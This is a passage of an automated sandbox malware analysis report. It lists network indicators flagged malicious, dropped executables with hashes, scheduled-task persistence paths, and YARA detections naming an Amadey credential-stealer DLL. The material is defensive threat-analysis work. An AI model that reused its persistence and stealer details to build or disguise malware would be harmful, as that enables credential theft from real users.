                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2002/12/policyF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                43.231.112.109
                                                                                                                                                                                                hoteldostyk.comMongolia
                                                                                                                                                                                                63962ITOOLS-ASiToolsJSCMNtrue
                                                                                                                                                                                                65.21.213.208
                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                199592CP-ASDEfalse
                                                                                                                                                                                                216.58.215.238
                                                                                                                                                                                                youtube-ui.l.google.comUnited States
                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                195.96.151.51
                                                                                                                                                                                                cdn-102.anonfiles.comunknown
                                                                                                                                                                                                8437UTA-ASATtrue
                                                                                                                                                                                                140.82.121.4
                                                                                                                                                                                                github.comUnited States
                                                                                                                                                                                                36459GITHUBUSfalse
                                                                                                                                                                                                185.106.92.111
                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                t.meUnited Kingdom
                                                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                                                108.167.141.212
                                                                                                                                                                                                srshf.comUnited States
                                                                                                                                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                144.76.136.153
                                                                                                                                                                                                transfer.shGermany
                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                104.192.141.1
                                                                                                                                                                                                bitbucket.orgUnited States
                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                116.202.5.101
                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                3.5.21.195
                                                                                                                                                                                                s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                148.251.234.93
                                                                                                                                                                                                iplogger.comGermany
                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                185.199.108.133
                                                                                                                                                                                                raw.githubusercontent.comNetherlands
                                                                                                                                                                                                54113FASTLYUStrue
                                                                                                                                                                                                193.56.146.174
                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                10753LVLT-10753UStrue
                                                                                                                                                                                                77.232.37.228
                                                                                                                                                                                                o36fafs3sn6xou.comRussian Federation
                                                                                                                                                                                                28968EUT-ASEUTIPNetworkRUtrue
                                                                                                                                                                                                46.252.148.24
                                                                                                                                                                                                1ecosolution.itItaly
                                                                                                                                                                                                60087ASSUPERNOVAITtrue
                                                                                                                                                                                                45.154.253.151
                                                                                                                                                                                                anonfiles.comSweden
                                                                                                                                                                                                41634SVEASEtrue
                                                                                                                                                                                                193.56.146.168
                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                10753LVLT-10753UStrue
                                                                                                                                                                                                IP
                                                                                                                                                                                                192.168.2.3
                                                                                                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                                                                Analysis ID:749948
                                                                                                                                                                                                Start date and time:2022-11-19 16:56:08 +01:00
                                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 14m 47s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:light
                                                                                                                                                                                                Sample file name:q4Z52wRd28.exe
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                Number of analysed new started processes analysed:47
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@67/24@47/20
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                HDC Information:
                                                                                                                                                                                                • Successful, ratio: 30.8% (good quality ratio 21%)
                                                                                                                                                                                                • Quality average: 34.6%
                                                                                                                                                                                                • Quality standard deviation: 30%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                • Override analysis time to 240s for rundll32
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, watson.telemetry.microsoft.com
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                16:58:02Task SchedulerRun new task: Firefox Default Browser Agent 6797C828451BEB6A path: C:\Users\user\AppData\Roaming\cttgcew
                                                                                                                                                                                                16:58:34API Interceptor849x Sleep call for process: rovwer.exe modified
                                                                                                                                                                                                16:58:35Task SchedulerRun new task: rovwer.exe path: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                16:58:48API Interceptor1077x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                17:01:07API Interceptor3x Sleep call for process: F771.exe modified
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                Entropy (8bit):0.7876734657715041
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                                                MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                                                SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                                                SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                                                SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                Entropy (8bit):1.4755077381471955
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                                                                                MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                                                                                SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                                                                                SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                                                                                SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                                                Entropy (8bit):1.2882898331044472
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                                                                                MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                                                                                SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                                                                                SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                                                                                SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147456
                                                                                                                                                                                                Entropy (8bit):0.7217007190866341
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                                                                                MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                                                                                SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                                                                                SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                                                                                SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                                                Entropy (8bit):1.2882898331044472
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                                                                                MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                                                                                SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                                                                                SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                                                                                SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147456
                                                                                                                                                                                                Entropy (8bit):0.7217007190866341
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                                                                                MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                                                                                SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                                                                                SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                                                                                SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):129024
                                                                                                                                                                                                Entropy (8bit):6.5122035629449355
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
                                                                                                                                                                                                MD5:507E9DC7B9C42F535B6DF96D79179835
                                                                                                                                                                                                SHA1:ACF41FB549750023115F060071AA5CA8C33F249E
                                                                                                                                                                                                SHA-256:3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
                                                                                                                                                                                                SHA-512:70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 71%, Browse
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):83622
                                                                                                                                                                                                Entropy (8bit):7.896233698964525
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:CQK+hI2P4mo0keu1RQ99zoHIgtO7czx4997CGPdOjT06SejjnhiVxp669P:JAmo081RQfzbgtOm4HrlO/jTjhKhZ
                                                                                                                                                                                                MD5:B06A833A71D8716720C60C23DF02F550
                                                                                                                                                                                                SHA1:2FD374453D9C4CB2846545FDDC72DA9E180D59AA
                                                                                                                                                                                                SHA-256:A0B3FEDED6D6FA5822265F0F232E491533488D14AB18ABE177E34C2CC0F8828A
                                                                                                                                                                                                SHA-512:756F671F4FC63F0D36E263C6AC591F06D0CA3F6E3A58A1E184E25F53214495F147FA36AE7E4B6287F7940148EF53A657C7BF19B2831C5F25916FEAA90C70A875
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A852.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):385536
                                                                                                                                                                                                Entropy (8bit):6.960915435029956
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:jUN5jZipJMHjeMigfbk532zhVVPE+O1voXc:U5tipJMDDiKkpCDO
                                                                                                                                                                                                MD5:0E455D9C65E7D53A67C227DCD8D70FB8
                                                                                                                                                                                                SHA1:F776A9F8165D6E41FB249223B5568D9C3FFA23B4
                                                                                                                                                                                                SHA-256:29BF9DAF2F5FFC7DF253FA7FDD78E4A02669DF89FD7F0517A599F6C70EA1F121
                                                                                                                                                                                                SHA-512:D441908A743FECD572518624238C138C7C7F4A88779963D8134AC7B5E9CB89C52259A2F601BB8891A565DEF48B07771AB4EA623C81B54306F3290FFC364C5BCA
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.................*....D......P.......@....@...........................F.....aZ......................................t/..(....pC.xE....................E..................................... -..@............................................text...R(.......*.................. ..`.data....*B..@...*..................@....rsrc...xE...pC..F...X..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):385536
                                                                                                                                                                                                Entropy (8bit):6.960915435029956
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:jUN5jZipJMHjeMigfbk532zhVVPE+O1voXc:U5tipJMDDiKkpCDO
                                                                                                                                                                                                MD5:0E455D9C65E7D53A67C227DCD8D70FB8
                                                                                                                                                                                                SHA1:F776A9F8165D6E41FB249223B5568D9C3FFA23B4
                                                                                                                                                                                                SHA-256:29BF9DAF2F5FFC7DF253FA7FDD78E4A02669DF89FD7F0517A599F6C70EA1F121
                                                                                                                                                                                                SHA-512:D441908A743FECD572518624238C138C7C7F4A88779963D8134AC7B5E9CB89C52259A2F601BB8891A565DEF48B07771AB4EA623C81B54306F3290FFC364C5BCA
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.................*....D......P.......@....@...........................F.....aZ......................................t/..(....pC.xE....................E..................................... -..@............................................text...R(.......*.................. ..`.data....*B..@...*..................@....rsrc...xE...pC..F...X..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1235912
                                                                                                                                                                                                Entropy (8bit):7.847488370221355
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:tpoG1/LlgEyH9QhH0slclslX6ptmEh4NqYJUo02O7RVUCshnSVjGMY0tZ8bMyqZs:tpocLlac0s5Ih4Ny/Ybb
                                                                                                                                                                                                MD5:F96144B1D5B53D93CAADDDADE38DB5E9
                                                                                                                                                                                                SHA1:1587E66F9A4D83060EE597F983A7323A556BC1C0
                                                                                                                                                                                                SHA-256:63018F38311387AA7F511F090FD154EA6EC3799C2F4762890082793912C68146
                                                                                                                                                                                                SHA-512:824A86438150DF143C7475605600B4A03DBFA819806F193BE248650A3A70E97BDCD3D20CAC9B8B00693D464B5CBD168E1F0C78BEAA00D167B8A877CFBCE3C34C
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..{..M{..M{..M..fMg..M..SMi..M..gM...Mr.^Mr..M{..M&..M..bMy..M..WMz..M{.ZM}..M..PMz..MRich{..M................PE..L...O.wc.................X..........mk.......p....@.......................... ..................................................d........3...........................................................................p..\............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...,5..........................@....rsrc....3.......4..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3188224
                                                                                                                                                                                                Entropy (8bit):7.964888519163398
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:98304:9R5aeXkEIsmuDvFmvNtLmVLF5HLiBrvpPFI:9Dv5lJz4v3LMLiBrh2
                                                                                                                                                                                                MD5:44A7E13ECC55CE9797C5121B230D9927
                                                                                                                                                                                                SHA1:B99F1D86E6D9C7E0D694CA605ABD205663278487
                                                                                                                                                                                                SHA-256:9E0425E14520485FA7E86057D07D26E8064F99A7AD09E35211EDD4A428EE57AE
                                                                                                                                                                                                SHA-512:74DF06B20D23483F854B5A88E5CCDFE534497630A105614E6CD87F3238398E0FB03218CB864FD6F7798B69E083C1098225010AECD959FBEC28D63C0626711A9F
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 23%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!...O...O...O..wL...O..wK...O..wJ.e.O..wN...O...N..O.fK...O.fL...O.fJ..O.fJ...O.fM...O.Rich..O.................PE..d....0xc..........".... .6..........4..........@..............................1...........`..................................................^..(.............0.$$............0.(...P)...............................(..@............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....6-..p... -..T..............@....pdata..$$....0..&...t0.............@..@_RDATA..\.....0.......0.............@..@.reloc..(.....0.......0.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):342528
                                                                                                                                                                                                Entropy (8bit):6.812640405950158
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:CV8MTz4fnz5/zNOCVmcUh+3oQ9gOU+fzYBb6:bMYfz5smmM9gT6
                                                                                                                                                                                                MD5:19A79DADDFAAC09499E79ADE27E756F8
                                                                                                                                                                                                SHA1:6BFD114AF2D1A68C4724961C6E761373EFE66C52
                                                                                                                                                                                                SHA-256:3F2EA3CA90B2DF0D2A93DF0E4328F58077A5BDBB97B2DFFE81B589C057F93216
                                                                                                                                                                                                SHA-512:AEA9D6CF93EB6ADA5D895C70DA8CBF4CA56BEB1125FC33961E112DCBAEA122F82DD4CBC9FE241DDCC5F5EBC6A71F83B03BEAF645F3A6E2724ACB03E7D61007A3
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.,.?iB.?iB.?iB.!;..iB.!;.,iB.!;..AiB...9.<iB.?iC.FiB.!;.>iB.!;.>iB.!;.>iB.Rich?iB.........PE..L....^Na................. ....D......H.......0....@..........................pE......!......................................t%..(.....B..A................... E..................................... -..@............................................text...V........ .................. ..`.data.....A..0.......$..............@....rsrc....A....B..B..................@..@.reloc...A... E..B..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):341006
                                                                                                                                                                                                Entropy (8bit):7.632238569480827
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
                                                                                                                                                                                                MD5:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                                                SHA1:C2444E21CC72BFC1CD74197E327323EB2E3E3815
                                                                                                                                                                                                SHA-256:D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
                                                                                                                                                                                                SHA-512:BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):459264
                                                                                                                                                                                                Entropy (8bit):7.1855716974211346
                                                                                                                                                                                                Encrypted:false
